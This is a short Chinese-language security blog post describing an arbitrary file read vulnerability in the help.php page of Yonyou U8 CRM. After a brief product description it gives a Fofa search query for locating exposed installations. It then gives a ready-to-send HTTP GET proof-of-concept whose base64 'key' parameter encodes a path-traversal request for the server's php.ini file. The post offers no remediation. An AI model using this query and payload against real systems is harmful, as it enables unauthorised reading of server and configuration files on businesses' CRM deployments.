用友crm客户关系管理help.php存在任意文件读取漏洞

产品介绍:

用友U8CRM模块是一个综合性的客户关系管理系统,旨在帮助企业从客户出发,以客户关系为管理对象,通过动态管理客户信息、获得

客户知识和评判客户价值状况,来全面提升并保持企业的竞争优势及盈利能力。

 

Fofa语句:

 

body="用友 U8CRM"

 

 

poc

 

GET /pub/help.php?key=YTozOntpOjA7czoyNDoiLy4uLy4uLy4uL2FwYWNoZS9waHAuaW5pIjtpOjE7czoxOiIxIjtpOjI7czoxOiIyIjt9 HTTP/1.1

Host:

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

 

 

 

 

posted @ 2024-08-20 21:48  魔都安全札记  阅读(122)  评论(0)    收藏  举报